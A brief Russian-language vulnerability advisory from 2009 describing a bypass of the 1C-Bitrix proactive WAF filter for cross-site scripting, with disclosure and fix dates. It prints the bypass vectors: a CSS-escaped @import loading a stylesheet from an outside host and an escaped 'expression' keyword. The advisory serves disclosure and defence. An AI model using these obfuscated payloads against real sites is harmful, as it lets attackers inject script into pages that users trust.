Цель: 1C Bitrix WAF <=8.0.5
Тип: Межсайтовый скриптинг
Угроза: Средняя
Дата обнаружения: 29.08.2009
Дата оповещения разработчика: 29.08.2009
Дата выхода исправления: 01.09.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Проактивный фильтр WAF системы управления контентом 1С-Битрикс осуществляет проверку входных данных пользователя на наличие потенциально опасных строк. Он имеет огромную базу регулярных выражений и фильтрует множество вариантов реализаций SQL инъекций, Includes, XSS. Обход фильтра был найден после недолгого подбора по следующим векторам:
<style>
@\69\6D\70\6F\72\74 url(http://onsec.ru/xss.css);
</style>
e\xp\re\s\s\i\o\n
Из-за ограниченного времени исследователя, других попыток обойти фильтр сделано не было. Затраченное время на подбор составило 40 минут.